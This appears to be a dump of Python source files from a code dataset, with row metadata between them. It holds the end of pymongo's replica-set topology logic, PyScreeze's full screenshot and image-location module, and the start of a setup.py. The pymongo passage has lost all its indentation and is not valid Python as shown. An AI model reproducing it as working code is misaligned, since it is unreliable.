:class:`~pymongo.server_description.ServerDescription`)."""
return self._server_descriptions.copy()
@property
def topology_type(self):
"""The type of this topology."""
return self._topology_type
@property
def topology_type_name(self):
"""The topology type as a human readable string.
.. versionadded:: 3.4
"""
return TOPOLOGY_TYPE._fields[self._topology_type]
@property
def replica_set_name(self):
"""The replica set name."""
return self._replica_set_name
@property
def max_set_version(self):
"""Greatest setVersion seen from a primary, or None."""
return self._max_set_version
@property
def max_election_id(self):
"""Greatest electionId seen from a primary, or None."""
return self._max_election_id
@property
def logical_session_timeout_minutes(self):
"""Minimum logical session timeout, or None."""
return self._ls_timeout_minutes
@property
def known_servers(self):
"""List of Servers of types besides Unknown."""
return [s for s in self._server_descriptions.values()
if s.is_server_type_known]
@property
def has_known_servers(self):
"""Whether there are any Servers of types besides Unknown."""
return any(s for s in self._server_descriptions.values()
if s.is_server_type_known)
@property
def readable_servers(self):
"""List of readable Servers."""
return [s for s in self._server_descriptions.values() if s.is_readable]
@property
def common_wire_version(self):
"""Minimum of all servers' max wire versions, or None."""
servers = self.known_servers
if servers:
return min(s.max_wire_version for s in self.known_servers)
return None
@property
def heartbeat_frequency(self):
return self._topology_settings.heartbeat_frequency
def apply_selector(self, selector, address, custom_selector=None):
def apply_local_threshold(selection):
if not selection:
return []
settings = self._topology_settings
# Round trip time in seconds.
fastest = min(
s.round_trip_time for s in selection.server_descriptions)
threshold = settings.local_threshold_ms / 1000.0
return [s for s in selection.server_descriptions
if (s.round_trip_time - fastest) <= threshold]
if getattr(selector, 'min_wire_version', 0):
common_wv = self.common_wire_version
if common_wv and common_wv < selector.min_wire_version:
raise ConfigurationError(
"%s requires min wire version %d, but topology's min"
" wire version is %d" % (selector,
selector.min_wire_version,
common_wv))
if self.topology_type == TOPOLOGY_TYPE.Single:
# Ignore selectors for standalone.
return self.known_servers
elif address:
# Ignore selectors when explicit address is requested.
description = self.server_descriptions().get(address)
return [description] if description else []
elif self.topology_type == TOPOLOGY_TYPE.Sharded:
# Ignore read preference.
selection = Selection.from_topology_description(self)
else:
selection = selector(Selection.from_topology_description(self))
# Apply custom selector followed by localThresholdMS.
if custom_selector is not None and selection:
selection = selection.with_server_descriptions(
custom_selector(selection.server_descriptions))
return apply_local_threshold(selection)
def has_readable_server(self, read_preference=ReadPreference.PRIMARY):
"""Does this topology have any readable servers available matching the
given read preference?
:Parameters:
- `read_preference`: an instance of a read preference from
:mod:`~pymongo.read_preferences`. Defaults to
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY`.
.. note:: When connected directly to a single server this method
always returns ``True``.
.. versionadded:: 3.4
"""
common.validate_read_preference("read_preference", read_preference)
return any(self.apply_selector(read_preference, None))
def has_writable_server(self):
"""Does this topology have a writable server available?
.. note:: When connected directly to a single server this method
always returns ``True``.
.. versionadded:: 3.4
"""
return self.has_readable_server(ReadPreference.PRIMARY)
# If topology type is Unknown and we receive an ismaster response, what should
# the new topology type be?
_SERVER_TYPE_TO_TOPOLOGY_TYPE = {
SERVER_TYPE.Mongos: TOPOLOGY_TYPE.Sharded,
SERVER_TYPE.RSPrimary: TOPOLOGY_TYPE.ReplicaSetWithPrimary,
SERVER_TYPE.RSSecondary: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
SERVER_TYPE.RSArbiter: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
SERVER_TYPE.RSOther: TOPOLOGY_TYPE.ReplicaSetNoPrimary,
}
def updated_topology_description(topology_description, server_description):
"""Return an updated copy of a TopologyDescription.
:Parameters:
- `topology_description`: the current TopologyDescription
- `server_description`: a new ServerDescription that resulted from
an ismaster call
Called after attempting (successfully or not) to call ismaster on the
server at server_description.address. Does not modify topology_description.
"""
address = server_description.address
# These values will be updated, if necessary, to form the new
# TopologyDescription.
topology_type = topology_description.topology_type
set_name = topology_description.replica_set_name
max_set_version = topology_description.max_set_version
max_election_id = topology_description.max_election_id
server_type = server_description.server_type
# Don't mutate the original dict of server descriptions; copy it.
sds = topology_description.server_descriptions()
# Replace this server's description with the new one.
sds[address] = server_description
if topology_type == TOPOLOGY_TYPE.Single:
# Single type never changes.
return TopologyDescription(
TOPOLOGY_TYPE.Single,
sds,
set_name,
max_set_version,
max_election_id,
topology_description._topology_settings)
if topology_type == TOPOLOGY_TYPE.Unknown:
if server_type == SERVER_TYPE.Standalone:
sds.pop(address)
elif server_type not in (SERVER_TYPE.Unknown, SERVER_TYPE.RSGhost):
topology_type = _SERVER_TYPE_TO_TOPOLOGY_TYPE[server_type]
if topology_type == TOPOLOGY_TYPE.Sharded:
if server_type not in (SERVER_TYPE.Mongos, SERVER_TYPE.Unknown):
sds.pop(address)
elif topology_type == TOPOLOGY_TYPE.ReplicaSetNoPrimary:
if server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos):
sds.pop(address)
elif server_type == SERVER_TYPE.RSPrimary:
(topology_type,
set_name,
max_set_version,
max_election_id) = _update_rs_from_primary(sds,
set_name,
server_description,
max_set_version,
max_election_id)
elif server_type in (
SERVER_TYPE.RSSecondary,
SERVER_TYPE.RSArbiter,
SERVER_TYPE.RSOther):
topology_type, set_name = _update_rs_no_primary_from_member(
sds, set_name, server_description)
elif topology_type == TOPOLOGY_TYPE.ReplicaSetWithPrimary:
if server_type in (SERVER_TYPE.Standalone, SERVER_TYPE.Mongos):
sds.pop(address)
topology_type = _check_has_primary(sds)
elif server_type == SERVER_TYPE.RSPrimary:
(topology_type,
set_name,
max_set_version,
max_election_id) = _update_rs_from_primary(sds,
set_name,
server_description,
max_set_version,
max_election_id)
elif server_type in (
SERVER_TYPE.RSSecondary,
SERVER_TYPE.RSArbiter,
SERVER_TYPE.RSOther):
topology_type = _update_rs_with_primary_from_member(
sds, set_name, server_description)
else:
# Server type is Unknown or RSGhost: did we just lose the primary?
topology_type = _check_has_primary(sds)
# Return updated copy.
return TopologyDescription(topology_type,
sds,
set_name,
max_set_version,
max_election_id,
topology_description._topology_settings)
def _update_rs_from_primary(
sds,
replica_set_name,
server_description,
max_set_version,
max_election_id):
"""Update topology description from a primary's ismaster response.
Pass in a dict of ServerDescriptions, current replica set name, the
ServerDescription we are processing, and the TopologyDescription's
max_set_version and max_election_id if any.
Returns (new topology type, new replica_set_name, new max_set_version,
new max_election_id).
"""
if replica_set_name is None:
replica_set_name = server_description.replica_set_name
elif replica_set_name != server_description.replica_set_name:
# We found a primary but it doesn't have the replica_set_name
# provided by the user.
sds.pop(server_description.address)
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
max_election_tuple = max_set_version, max_election_id
if None not in server_description.election_tuple:
if (None not in max_election_tuple and
max_election_tuple > server_description.election_tuple):
# Stale primary, set to type Unknown.
address = server_description.address
sds[address] = ServerDescription(address)
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
max_election_id = server_description.election_id
if (server_description.set_version is not None and
(max_set_version is None or
server_description.set_version > max_set_version)):
max_set_version = server_description.set_version
# We've heard from the primary. Is it the same primary as before?
for server in sds.values():
if (server.server_type is SERVER_TYPE.RSPrimary
and server.address != server_description.address):
# Reset old primary's type to Unknown.
sds[server.address] = ServerDescription(server.address)
# There can be only one prior primary.
break
# Discover new hosts from this primary's response.
for new_address in server_description.all_hosts:
if new_address not in sds:
sds[new_address] = ServerDescription(new_address)
# Remove hosts not in the response.
for addr in set(sds) - server_description.all_hosts:
sds.pop(addr)
# If the host list differs from the seed list, we may not have a primary
# after all.
return (_check_has_primary(sds),
replica_set_name,
max_set_version,
max_election_id)
def _update_rs_with_primary_from_member(
sds,
replica_set_name,
server_description):
"""RS with known primary. Process a response from a non-primary.
Pass in a dict of ServerDescriptions, current replica set name, and the
ServerDescription we are processing.
Returns new topology type.
"""
assert replica_set_name is not None
if replica_set_name != server_description.replica_set_name:
sds.pop(server_description.address)
elif (server_description.me and
server_description.address != server_description.me):
sds.pop(server_description.address)
# Had this member been the primary?
return _check_has_primary(sds)
def _update_rs_no_primary_from_member(
sds,
replica_set_name,
server_description):
"""RS without known primary. Update from a non-primary's response.
Pass in a dict of ServerDescriptions, current replica set name, and the
ServerDescription we are processing.
Returns (new topology type, new replica_set_name).
"""
topology_type = TOPOLOGY_TYPE.ReplicaSetNoPrimary
if replica_set_name is None:
replica_set_name = server_description.replica_set_name
elif replica_set_name != server_description.replica_set_name:
sds.pop(server_description.address)
return topology_type, replica_set_name
# This isn't the primary's response, so don't remove any servers
# it doesn't report. Only add new servers.
for address in server_description.all_hosts:
if address not in sds:
sds[address] = ServerDescription(address)
if (server_description.me and
server_description.address != server_description.me):
sds.pop(server_description.address)
return topology_type, replica_set_name
def _check_has_primary(sds):
"""Current topology type is ReplicaSetWithPrimary. Is primary still known?
Pass in a dict of ServerDescriptions.
Returns new topology type.
"""
for s in sds.values():
if s.server_type == SERVER_TYPE.RSPrimary:
return TOPOLOGY_TYPE.ReplicaSetWithPrimary
else:
return TOPOLOGY_TYPE.ReplicaSetNoPrimary
| 37.785714 | 79 | 0.643255 |
de20db9d20b3fea301e302fd208e22c155e603ef | 23,323 | py | Python | venv/Lib/site-packages/pyscreeze/__init__.py | SteevenBrunner/gmail-generator | 0ab6f047faad48c388c6d7d2b887f33b6839b6f9 | [
"MIT"
] | 102 | 2018-11-06T21:54:27.000Z | 2022-02-26T16:35:06.000Z | venv/Lib/site-packages/pyscreeze/__init__.py | AsterLaoWhy/Navi | 819e4cc9e70721d65da5979e0c7a6fead9eb9d6e | [
"MIT"
] | 26 | 2018-10-09T13:40:18.000Z | 2021-10-16T23:28:26.000Z | venv/Lib/site-packages/pyscreeze/__init__.py | AsterLaoWhy/Navi | 819e4cc9e70721d65da5979e0c7a6fead9eb9d6e | [
"MIT"
] | 36 | 2018-08-08T03:43:00.000Z | 2022-02-02T16:29:55.000Z | # PyScreeze
"""
NOTE:
Apparently Pillow support on Ubuntu 64-bit has several additional steps since it doesn't have JPEG/PNG support out of the box. Description here:
https://stackoverflow.com/questions/7648200/pip-install-pil-e-tickets-1-no-jpeg-png-support
http://ubuntuforums.org/showthread.php?t=1751455
"""
__version__ = '0.1.26'
import collections
import datetime
import functools
import os
import subprocess
import sys
import time
import errno
from contextlib import contextmanager
try:
from PIL import Image
from PIL import ImageOps
from PIL import ImageDraw
if sys.platform == 'win32': # TODO - Pillow now supports ImageGrab on macOS.
from PIL import ImageGrab
_PILLOW_UNAVAILABLE = False
except ImportError:
# We ignore this because failures due to Pillow not being installed
# should only happen when the functions that specifically depend on
# Pillow are called. The main use case is when PyAutoGUI imports
# PyScreeze, but Pillow isn't installed because the user is running
# some platform/version of Python that Pillow doesn't support, then
# importing PyAutoGUI should not automatically fail because it
# imports PyScreeze.
# So we have a `pass` statement here since a failure to import
# Pillow shouldn't crash PyScreeze.
_PILLOW_UNAVAILABLE = True
try:
import cv2, numpy
useOpenCV = True
RUNNING_CV_2 = cv2.__version__[0] < '3'
except ImportError:
useOpenCV = False
RUNNING_PYTHON_2 = sys.version_info[0] == 2
if useOpenCV:
if RUNNING_CV_2:
LOAD_COLOR = cv2.CV_LOAD_IMAGE_COLOR
LOAD_GRAYSCALE = cv2.CV_LOAD_IMAGE_GRAYSCALE
else:
LOAD_COLOR = cv2.IMREAD_COLOR
LOAD_GRAYSCALE = cv2.IMREAD_GRAYSCALE
if not RUNNING_PYTHON_2:
unicode = str # On Python 3, all the isinstance(spam, (str, unicode)) calls will work the same as Python 2.
if sys.platform == 'win32':
# On Windows, the monitor scaling can be set to something besides normal 100%.
# PyScreeze and Pillow needs to account for this to make accurate screenshots.
# TODO - How does macOS and Linux handle monitor scaling?
import ctypes
try:
ctypes.windll.user32.SetProcessDPIAware()
except AttributeError:
pass # Windows XP doesn't support monitor scaling, so just do nothing.
GRAYSCALE_DEFAULT = False
# For version 0.1.19 I changed it so that ImageNotFoundException was raised
# instead of returning None. In hindsight, this change came too late, so I'm
# changing it back to returning None. But I'm also including this option for
# folks who would rather have it raise an exception.
USE_IMAGE_NOT_FOUND_EXCEPTION = False
scrotExists = False
try:
if sys.platform not in ('java', 'darwin', 'win32'):
whichProc = subprocess.Popen(
['which', 'scrot'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
scrotExists = whichProc.wait() == 0
except OSError as ex:
if ex.errno == errno.ENOENT:
# if there is no "which" program to find scrot, then assume there
# is no scrot.
pass
else:
raise
if sys.platform == 'win32':
from ctypes import windll
# win32 DC(DeviceContext) Manager
@contextmanager
def __win32_openDC(hWnd):
"""
        Context manager that acquires a Windows device context (DC) for the given
        window handle via GetDC and guarantees it is released with ReleaseDC,
        raising WindowsError if either call fails.
"""
hDC = windll.user32.GetDC(hWnd)
if hDC == 0: #NULL
raise WindowsError("windll.user32.GetDC failed : return NULL")
try:
yield hDC
finally:
if windll.user32.ReleaseDC(hWnd, hDC) == 0:
raise WindowsError("windll.user32.ReleaseDC failed : return 0")
Box = collections.namedtuple('Box', 'left top width height')
Point = collections.namedtuple('Point', 'x y')
RGB = collections.namedtuple('RGB', 'red green blue')
class PyScreezeException(Exception):
pass # This is a generic exception class raised when a PyScreeze-related error happens.
class ImageNotFoundException(PyScreezeException):
pass # This is an exception class raised when the locate functions fail to locate an image.
def requiresPillow(wrappedFunction):
"""
A decorator that marks a function as requiring Pillow to be installed.
This raises PyScreezeException if Pillow wasn't imported.
"""
@functools.wraps(wrappedFunction)
def wrapper(*args, **kwargs):
if _PILLOW_UNAVAILABLE:
raise PyScreezeException('The Pillow package is required to use this function.')
return wrappedFunction(*args, **kwargs)
return wrapper
def _load_cv2(img, grayscale=None):
"""
    Load an image as an OpenCV (numpy BGR) array. `img` may be a filename, a numpy
    array, or a PIL Image; it is converted to grayscale when requested.
"""
# load images if given filename, or convert as needed to opencv
# Alpha layer just causes failures at this point, so flatten to RGB.
# RGBA: load with -1 * cv2.CV_LOAD_IMAGE_COLOR to preserve alpha
# to matchTemplate, need template and image to be the same wrt having alpha
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
if isinstance(img, (str, unicode)):
# The function imread loads an image from the specified file and
# returns it. If the image cannot be read (because of missing
# file, improper permissions, unsupported or invalid format),
# the function returns an empty matrix
# http://docs.opencv.org/3.0-beta/modules/imgcodecs/doc/reading_and_writing_images.html
if grayscale:
img_cv = cv2.imread(img, LOAD_GRAYSCALE)
else:
img_cv = cv2.imread(img, LOAD_COLOR)
if img_cv is None:
raise IOError("Failed to read %s because file is missing, "
"has improper permissions, or is an "
"unsupported or invalid format" % img)
elif isinstance(img, numpy.ndarray):
# don't try to convert an already-gray image to gray
if grayscale and len(img.shape) == 3: # and img.shape[2] == 3:
img_cv = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
else:
img_cv = img
elif hasattr(img, 'convert'):
        # assume it's a PIL.Image, convert to cv format
img_array = numpy.array(img.convert('RGB'))
img_cv = img_array[:, :, ::-1].copy() # -1 does RGB -> BGR
if grayscale:
img_cv = cv2.cvtColor(img_cv, cv2.COLOR_BGR2GRAY)
else:
raise TypeError('expected an image filename, OpenCV numpy array, or PIL image')
return img_cv
def _locateAll_opencv(needleImage, haystackImage, grayscale=None, limit=10000, region=None, step=1,
confidence=0.999):
"""
TODO - rewrite this
faster but more memory-intensive than pure python
step 2 skips every other row and column = ~3x faster but prone to miss;
to compensate, the algorithm automatically reduces the confidence
threshold by 5% (which helps but will not avoid all misses).
limitations:
- OpenCV 3.x & python 3.x not tested
- RGBA images are treated as RBG (ignores alpha channel)
"""
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
confidence = float(confidence)
needleImage = _load_cv2(needleImage, grayscale)
needleHeight, needleWidth = needleImage.shape[:2]
haystackImage = _load_cv2(haystackImage, grayscale)
if region:
haystackImage = haystackImage[region[1]:region[1]+region[3],
region[0]:region[0]+region[2]]
else:
region = (0, 0) # full image; these values used in the yield statement
if (haystackImage.shape[0] < needleImage.shape[0] or
haystackImage.shape[1] < needleImage.shape[1]):
# avoid semi-cryptic OpenCV error below if bad size
raise ValueError('needle dimension(s) exceed the haystack image or region dimensions')
if step == 2:
confidence *= 0.95
needleImage = needleImage[::step, ::step]
haystackImage = haystackImage[::step, ::step]
else:
step = 1
# get all matches at once, credit: https://stackoverflow.com/questions/7670112/finding-a-subimage-inside-a-numpy-image/9253805#9253805
result = cv2.matchTemplate(haystackImage, needleImage, cv2.TM_CCOEFF_NORMED)
match_indices = numpy.arange(result.size)[(result > confidence).flatten()]
matches = numpy.unravel_index(match_indices[:limit], result.shape)
if len(matches[0]) == 0:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image (highest confidence = %.3f)' % result.max())
else:
return
# use a generator for API consistency:
matchx = matches[1] * step + region[0] # vectorized
matchy = matches[0] * step + region[1]
for x, y in zip(matchx, matchy):
yield Box(x, y, needleWidth, needleHeight)
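# Illustrative sketch (not part of the original code): how the index math above
# maps cv2.matchTemplate scores back to x/y coordinates. The score array, step
# and region values are hypothetical; only numpy is required.
def _example_opencv_index_math():
    fake_result = numpy.array([[0.10, 0.99, 0.20],
                               [0.30, 0.40, 0.98]])  # pretend matchTemplate output
    match_indices = numpy.arange(fake_result.size)[(fake_result > 0.9).flatten()]
    matches = numpy.unravel_index(match_indices, fake_result.shape)
    step, region = 1, (10, 20)  # hypothetical subsampling step and search-region offset
    matchx = matches[1] * step + region[0]  # columns become x coordinates
    matchy = matches[0] * step + region[1]  # rows become y coordinates
    return list(zip(matchx, matchy))  # x/y pairs (11, 20) and (12, 21)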
# TODO - We should consider renaming _locateAll_python to _locateAll_pillow, since Pillow is the real dependency.
@requiresPillow
def _locateAll_python(needleImage, haystackImage, grayscale=None, limit=None, region=None, step=1):
"""
TODO
"""
# setup all the arguments
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
needleFileObj = None
if isinstance(needleImage, (str, unicode)):
# 'image' is a filename, load the Image object
needleFileObj = open(needleImage, 'rb')
needleImage = Image.open(needleFileObj)
haystackFileObj = None
if isinstance(haystackImage, (str, unicode)):
# 'image' is a filename, load the Image object
haystackFileObj = open(haystackImage, 'rb')
haystackImage = Image.open(haystackFileObj)
if region is not None:
haystackImage = haystackImage.crop((region[0], region[1], region[0] + region[2], region[1] + region[3]))
else:
region = (0, 0) # set to 0 because the code always accounts for a region
if grayscale: # if grayscale mode is on, convert the needle and haystack images to grayscale
needleImage = ImageOps.grayscale(needleImage)
haystackImage = ImageOps.grayscale(haystackImage)
else:
# if not using grayscale, make sure we are comparing RGB images, not RGBA images.
if needleImage.mode == 'RGBA':
needleImage = needleImage.convert('RGB')
if haystackImage.mode == 'RGBA':
haystackImage = haystackImage.convert('RGB')
# setup some constants we'll be using in this function
needleWidth, needleHeight = needleImage.size
haystackWidth, haystackHeight = haystackImage.size
needleImageData = tuple(needleImage.getdata())
haystackImageData = tuple(haystackImage.getdata())
needleImageRows = [needleImageData[y * needleWidth:(y+1) * needleWidth] for y in range(needleHeight)] # LEFT OFF - check this
needleImageFirstRow = needleImageRows[0]
assert len(needleImageFirstRow) == needleWidth, 'For some reason, the calculated width of first row of the needle image is not the same as the width of the image.'
assert [len(row) for row in needleImageRows] == [needleWidth] * needleHeight, 'For some reason, the needleImageRows aren\'t the same size as the original image.'
numMatchesFound = 0
    # NOTE: After running tests/benchmarks.py on the following code, it seems that having a step
# value greater than 1 does not give *any* significant performance improvements.
# Since using a step higher than 1 makes for less accurate matches, it will be
# set to 1.
step = 1 # hard-code step as 1 until a way to improve it can be figured out.
if step == 1:
firstFindFunc = _kmp
else:
firstFindFunc = _steppingFind
for y in range(haystackHeight): # start at the leftmost column
for matchx in firstFindFunc(needleImageFirstRow, haystackImageData[y * haystackWidth:(y+1) * haystackWidth], step):
foundMatch = True
for searchy in range(1, needleHeight, step):
haystackStart = (searchy + y) * haystackWidth + matchx
if needleImageData[searchy * needleWidth:(searchy+1) * needleWidth] != haystackImageData[haystackStart:haystackStart + needleWidth]:
foundMatch = False
break
if foundMatch:
# Match found, report the x, y, width, height of where the matching region is in haystack.
numMatchesFound += 1
yield Box(matchx + region[0], y + region[1], needleWidth, needleHeight)
if limit is not None and numMatchesFound >= limit:
# Limit has been reached. Close file handles.
if needleFileObj is not None:
needleFileObj.close()
if haystackFileObj is not None:
haystackFileObj.close()
return
# There was no limit or the limit wasn't reached, but close the file handles anyway.
if needleFileObj is not None:
needleFileObj.close()
if haystackFileObj is not None:
haystackFileObj.close()
if numMatchesFound == 0:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image.')
else:
return
def locate(needleImage, haystackImage, **kwargs):
"""
TODO
"""
# Note: The gymnastics in this function is because we want to make sure to exhaust the iterator so that the needle and haystack files are closed in locateAll.
kwargs['limit'] = 1
points = tuple(locateAll(needleImage, haystackImage, **kwargs))
if len(points) > 0:
return points[0]
else:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image.')
else:
return None
def locateOnScreen(image, minSearchTime=0, **kwargs):
"""TODO - rewrite this
minSearchTime - amount of time in seconds to repeat taking
screenshots and trying to locate a match. The default of 0 performs
a single search.
"""
start = time.time()
while True:
try:
screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here.
retVal = locate(image, screenshotIm, **kwargs)
try:
screenshotIm.fp.close()
except AttributeError:
# Screenshots on Windows won't have an fp since they came from
# ImageGrab, not a file. Screenshots on Linux will have fp set
# to None since the file has been unlinked
pass
if retVal or time.time() - start > minSearchTime:
return retVal
except ImageNotFoundException:
if time.time() - start > minSearchTime:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise
else:
return None
def locateAllOnScreen(image, **kwargs):
"""
TODO
"""
# TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator?
screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here.
retVal = locateAll(image, screenshotIm, **kwargs)
try:
screenshotIm.fp.close()
except AttributeError:
# Screenshots on Windows won't have an fp since they came from
# ImageGrab, not a file. Screenshots on Linux will have fp set
# to None since the file has been unlinked
pass
return retVal
def locateCenterOnScreen(image, **kwargs):
"""
TODO
"""
coords = locateOnScreen(image, **kwargs)
if coords is None:
return None
else:
return center(coords)
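# Illustrative usage sketch (not part of the original code): how the locate*
# helpers above are typically combined. The image path is hypothetical and the
# calls need a working screenshot backend, so this function is never invoked here.
def _example_locate_usage():
    box = locateOnScreen('button.png', minSearchTime=2)  # Box(left, top, width, height) or None
    if box is None:
        return None
    point = center(box)  # Point(x, y) at the middle of the match
    all_boxes = list(locateAllOnScreen('button.png'))  # every match on the screen
    return point, all_boxes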
@requiresPillow
def showRegionOnScreen(region, outlineColor='red', filename='_showRegionOnScreen.png'):
"""
TODO
"""
# TODO - This function is useful! Document it!
screenshotIm = screenshot()
draw = ImageDraw.Draw(screenshotIm)
    region = (region[0], region[1], region[2] + region[0], region[3] + region[1]) # convert from (left, top, width, height) to (left, top, right, bottom)
draw.rectangle(region, outline=outlineColor)
screenshotIm.save(filename)
@requiresPillow
def _screenshot_win32(imageFilename=None, region=None):
"""
TODO
"""
# TODO - Use the winapi to get a screenshot, and compare performance with ImageGrab.grab()
# https://stackoverflow.com/a/3586280/1893164
im = ImageGrab.grab()
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
if imageFilename is not None:
im.save(imageFilename)
return im
def _screenshot_osx(imageFilename=None, region=None):
"""
TODO
"""
# TODO - use tmp name for this file.
if imageFilename is None:
tmpFilename = 'screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f'))
else:
tmpFilename = imageFilename
subprocess.call(['screencapture', '-x', tmpFilename])
im = Image.open(tmpFilename)
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
os.unlink(tmpFilename) # delete image of entire screen to save cropped version
im.save(tmpFilename)
else:
# force loading before unlinking, Image.open() is lazy
im.load()
if imageFilename is None:
os.unlink(tmpFilename)
return im
def _screenshot_linux(imageFilename=None, region=None):
"""
TODO
"""
if not scrotExists:
raise NotImplementedError('"scrot" must be installed to use screenshot functions in Linux. Run: sudo apt-get install scrot')
if imageFilename is None:
tmpFilename = '.screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f'))
else:
tmpFilename = imageFilename
if scrotExists:
subprocess.call(['scrot', '-z', tmpFilename])
im = Image.open(tmpFilename)
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
os.unlink(tmpFilename) # delete image of entire screen to save cropped version
im.save(tmpFilename)
else:
# force loading before unlinking, Image.open() is lazy
im.load()
if imageFilename is None:
os.unlink(tmpFilename)
return im
else:
raise Exception('The scrot program must be installed to take a screenshot with PyScreeze on Linux. Run: sudo apt-get install scrot')
def _kmp(needle, haystack, _dummy): # Knuth-Morris-Pratt search algorithm implementation (to be used by screen capture)
"""
TODO
"""
# build table of shift amounts
shifts = [1] * (len(needle) + 1)
shift = 1
for pos in range(len(needle)):
while shift <= pos and needle[pos] != needle[pos-shift]:
shift += shifts[pos-shift]
shifts[pos+1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in haystack:
while matchLen == len(needle) or \
matchLen >= 0 and needle[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(needle):
yield startPos
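# Illustrative sketch (not part of the original code): what _kmp yields for a
# tiny hypothetical pair of pixel-value sequences.
def _example_kmp():
    needle = (2, 3)
    haystack = (1, 2, 3, 0, 2, 3, 5)
    return list(_kmp(needle, haystack, None))  # [1, 4] - start indices of both matches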
def _steppingFind(needle, haystack, step):
"""
TODO
"""
for startPos in range(0, len(haystack) - len(needle) + 1):
foundMatch = True
for pos in range(0, len(needle), step):
if haystack[startPos + pos] != needle[pos]:
foundMatch = False
break
if foundMatch:
yield startPos
def center(coords):
"""
    Returns a `Point` object with x and y set to the integer center of the box described by `coords`.
The `coords` argument is a 4-integer tuple of (left, top, width, height).
For example:
>>> center((10, 10, 6, 8))
Point(x=13, y=14)
>>> center((10, 10, 7, 9))
Point(x=13, y=14)
>>> center((10, 10, 8, 10))
Point(x=14, y=15)
"""
# TODO - one day, add code to handle a Box namedtuple.
return Point(coords[0] + int(coords[2] / 2), coords[1] + int(coords[3] / 2))
def pixelMatchesColor(x, y, expectedRGBColor, tolerance=0):
"""
TODO
"""
pix = pixel(x, y)
if len(pix) == 3 or len(expectedRGBColor) == 3: #RGB mode
r, g, b = pix[:3]
exR, exG, exB = expectedRGBColor[:3]
return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance)
elif len(pix) == 4 and len(expectedRGBColor) == 4: #RGBA mode
r, g, b, a = pix
exR, exG, exB, exA = expectedRGBColor
return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance) and (abs(a - exA) <= tolerance)
else:
assert False, 'Color mode was expected to be length 3 (RGB) or 4 (RGBA), but pixel is length %s and expectedRGBColor is length %s' % (len(pix), len(expectedRGBColor))
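# Illustrative usage sketch (not part of the original code): the coordinates and
# colors are hypothetical, and the calls need a screenshot backend to actually run.
def _example_pixel_match():
    exact = pixelMatchesColor(100, 200, (255, 0, 0))  # every channel must match exactly
    close = pixelMatchesColor(100, 200, (250, 5, 5), tolerance=10)  # each channel may differ by up to 10
    return exact, close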
def pixel(x, y):
"""
TODO
"""
if sys.platform == 'win32':
# On Windows, calling GetDC() and GetPixel() is twice as fast as using our screenshot() function.
with __win32_openDC(0) as hdc: # handle will be released automatically
color = windll.gdi32.GetPixel(hdc, x, y)
if color < 0:
raise WindowsError("windll.gdi32.GetPixel failed : return {}".format(color))
# color is in the format 0xbbggrr https://msdn.microsoft.com/en-us/library/windows/desktop/dd183449(v=vs.85).aspx
bbggrr = "{:0>6x}".format(color) # bbggrr => 'bbggrr' (hex)
b, g, r = (int(bbggrr[i:i+2], 16) for i in range(0, 6, 2))
return (r, g, b)
else:
# Need to select only the first three values of the color in
# case the returned pixel has an alpha channel
return RGB(*(screenshot().getpixel((x, y))[:3]))
# set the screenshot() function based on the platform running this module
if sys.platform.startswith('java'):
raise NotImplementedError('Jython is not yet supported by PyScreeze.')
elif sys.platform == 'darwin':
screenshot = _screenshot_osx
elif sys.platform == 'win32':
screenshot = _screenshot_win32
else: # TODO - Make this more specific. "Anything else" does not necessarily mean "Linux".
screenshot = _screenshot_linux
grab = screenshot # for compatibility with Pillow/PIL's ImageGrab module.
# set the locateAll function to use opencv if possible; python 3 needs opencv 3.0+
# TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator?
if useOpenCV:
locateAll = _locateAll_opencv
if not RUNNING_PYTHON_2 and cv2.__version__ < '3':
locateAll = _locateAll_python
else:
locateAll = _locateAll_python
| 38.171849 | 174 | 0.648673 |
4fcf9bb01e0eb8a58b1e7521096ed04c70a219ff | 1,076 | py | Python | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | 1 | 2019-11-19T21:06:43.000Z | 2019-11-19T21:06:43.000Z | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | 1 | 2019-11-19T19:35:29.000Z | 2019-11-19T19:35:29.000Z | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | null | null | null | import os
from setuptools import find_packages, setup
from eponym import __version__
